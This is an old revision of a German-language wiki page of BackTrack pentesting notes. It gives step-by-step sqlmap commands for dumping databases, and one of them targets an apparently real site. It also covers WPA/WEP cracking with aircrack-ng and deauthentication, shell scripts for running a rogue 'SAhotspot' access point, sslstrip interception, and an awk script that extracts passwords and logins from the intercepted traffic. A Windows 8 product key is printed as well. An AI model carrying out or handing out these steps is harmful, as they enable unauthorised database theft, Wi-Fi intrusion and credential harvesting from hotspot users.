**Dies ist eine alte Version des Dokuments!**
Inhaltsverzeichnis
BackTrack-Tutorials
BackTrack Testlab einrichten
Quelle 1: Anleitung für Testlab mit Virtualbox
Quelle 2: noch eine Anleitung zu Testlab in Virtualbox
OSX in Virtualbox installieren
Win8 Entwicklerversion installieren
Product Key: TK8TP-9JN6P-7X7WW-RFFTV-B7QPF
mySQL-Injection
los gehts mit öffnem von sqlmap
und jetzt suchen wir nach einer verwundbaren Seite. der code dazu
python sqlmap.py -u http://www.imot.ch/wordpress/?=56 --dbs
wir sehen die Datenbanken (z.B. wordpress)
jetzt gehts um die Inhalte er Datenbank, den Tabellen
python sqlmap.py -u http://sitename.com/index.php?id=444 -D DATENBANKNAME --tables
nun sind die Kolonnen dran
python sqlmap.py -u http://sitename.com/index.php?id=444 -D DATENBANKNAME -T TABLENAME --columns
jetzt sehen wir den Inhalt der Kolonnen (z.B. pwd, uname)
jetzt wollen wir den Inhalt lesen
python sqlmap.py -u http://sitename.com/index.php?id=444 -D DATENBANKNAME -T TABLENAME -C
WLAN Testen
Tools
crunch Wordlist-Generator
Quelle: adaywithtape - gute Beispiele
Quelle: adaywithtape - aktuelle Version
crunch starten
/pentest/passwords/crunch/crunch 4 4 -o test.txt
generiert eine Liste (test.txt) 4-stellig
Videos und Tutorials
Links
WLAN WPA-Verschlüsselung
Die nachfolgenden Befehle werden mit einem BackTrack5-Live-USB ausgeführt.
aircrack-ng WLAN-Verschlüsselung cracken
mon0 aktivieren
airmon-ng
mit Backtrack5 nicht mehr beachten
sudo service network-manager stop sudo service avahi-daemon stop kill <PID of wpa_supplicant>
mit Backtrack5 nicht mehr beachten (WLAN im Monitor-Modus starten)
airmon-ng start wlan0
Accesspoint und Client suchen
airodump-ng mon0
ESSID BSSID-MAC STATION-MAC CHANNEL speichern
Pakete von Accespoint erfassen
airodump-ng --bssid <BSSID MAC> -w <DATEI> -c <CHANNEL> mon0
in neuer Shell deauthentifizieren den Client für Handshake
aireplay-ng --deauth 10 -a <BSSID 00:00:00:> -c <STATION 00:00:00> mon0
auf erster Shell auf Handshake warten, in erster Zeile ersichtlich
Jetzt cracken wir den Schlüssel
aircrack-ng <DATEINAME> -w <WORDLIST.list>
WLAN für normalen Betrieb aktivieren
ifconfig wlan0 down iwconfig wlan0 mode managed ifconfig wlan0 up
mit Backtrack5 nicht mehr beachten (Dienste für normalen Betrieb wieder starten)
sudo service network-manager start sudo service avahi-daemon start
WLAN WEP-Verschlüsselung
Software installieren
sudo apt-get install aircrack-ng
Schnittstelle erkennen
ifconfig
ergibt wlan0
wlan0 runterfahren
airmon-ng stop wlan0 ifconfig wlan0 stop
wlan0 hochfahren (Monitor-Modus)
airmon-ng start wlan0
Lauschangriff starten (Überblick verschaffen)
airodump-ng wlan0
nach WEP suchen und Channel merken z.B. 6
Daten mitschreiben
airodump-ng -c 6 -w wlan --bssid 00:00:....
Daten sammeln, ca. 250'000
Datei durchsuchen / Passwort knacken
aircrack-ng -b 00:00:..... <DATEI-NAME VON VORHERIGEM PUNKT>
AccessPoint erstellen
Um zu demonstrieren wie gefährlich offene WLAN-AccessPoints sein können.
Links
Tutorial Rogue AP
Als erstes installieren wir den dhcp Server:
nach dieser Vorlage Fake AP mit Skript
$ apt-get install dhcp3-server -y
Falls noch nicht passiert, sollte ebenfalls aircrack-ng und iptables installiert werden
$ apt-get install aircrack-ng && iptables
Die Serverkonfigurationsdatei bennen wir zwecks Backup um:
$ mv /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.backup
Dann erstellen wir eine neue Serverkonfigurationsdatei:
$ nano /etc/dhcp3/dhcpd.conf
mit folgendem Inhalt:
ddns-update-style none;
default-lease-time 600;
max-lease-time 7200;
subnet 172.168.2.128 netmask 255.255.255.128 {
option subnet-mask 255.255.255.128;
option broadcast-address 172.168.2.255;
option routers 172.168.2.129;
option domain-name-servers 8.8.8.8;
range 172.168.2.130 172.168.2.140;
}
diese Schritte nur zu Beginn ausführen.
Danach mit folgenden zwei Skripten den Fake-AP ein-/ausschalten:
FakeAPstart.sh
#!/bin/bash echo "Killing Airbase-ng..." pkill airbase-ng sleep 2; echo "Killing DHCP..." pkill dhcpd3 sleep 5; echo "Putting Wlan In Monitor Mode..." airmon-ng stop wlan1 # Change to your wlan interface sleep 5; airmon-ng start wlan1 # Change to your wlan interface sleep 5; echo "Starting Fake AP..." airbase-ng -e SAhotspot -c 6 mon0 & # Change essid, channel and interface sleep 5; ifconfig at0 172.168.2.129 netmask 255.255.255.128 up # Change IP addresses as configured in your dhcpd.conf route add -net 172.168.2.128 netmask 255.255.255.128 gw 172.168.2.129 sleep 5; iptables -F iptables -t nat -F iptables -X iptables -t nat -X iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE # Change wlan0 to your internet facing interface iptables -A FORWARD -i at0 -j ACCEPT echo 1 > /proc/sys/net/ipv4/ip_forward dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0
FakeAPstop.sh
#!/bin/sh killall -9 dhcpd3 killall -9 airbase-ng iptables -F iptables -t nat -F iptables -X iptables -t nat -X echo 0 > /proc/sys/net/ipv4/ip_forward airmon-ng stop mon0
Tutorial Rogue AP auslesen
Jetzt wo der Server läuft können wir uns daran machen, den Verkehr auszulesen. Dazu müssen wir als erstes SSLstrip installieren:
$ cd /pentest/web/sslstrip/ $ python setup.py install
Iptables für SSLstrip
$ iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
SSLstrip starten mit folgenden Optionen:
$ sslstrip -a -f -k -w /root/sslstrip.log
diese Datei ist riesig und mit vielen Informationen bestückt. Damit wir nur die relevanten Daten erhalten, bauen wir uns ein Skript mit folgendem Inhalt:
#!/bin/bash
echo "Do you want to save passwords to a file? (Y=keep)"
echo "(If you want to keep it, it will be saved in /root/filename.pass.txt)"
read -e keeppd
if [[ $keeppd = "Y" || $keeppd = "y" ]] ; then
cat /root/sslstrip.log |
awk -F "&" '!/GET/ && !/if/ !/header/ && !/^[0-9]/ && !/</ && /[PpEeUuLlCc_][A-Za-z]*=[A-Za-z0-9.%_-]*/ {if (NF >= 2) print $0}' |
awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
egrep -a -i "pwd=|pass=|passwd=|password=|textbox=|email=|user=|username=|login=|credential=|_user|_pwd=|email_address=" |
awk -F "=" '{if (length($2) < 3) print "\b"; else if ($1 ~/[Pp]/) print "Password = " $2"\n"; else print "Login =", $2}' >& /root/filename.pass.txt
if [ -f "/root/filename.pass.txt" ]; then
echo "Passwords saved !"
else echo "Error while saving passwords"
fi
else echo "Password saving skipped."
fi
rm /root/filename.txt
echo -e "\nTemporary files deleted."
Das Skript kann noch angepasst werden. Danach das Skript ausführbar machen:
$ chmod +x Skript.sh
und starten (Abfrage mit „Y“ beantworten.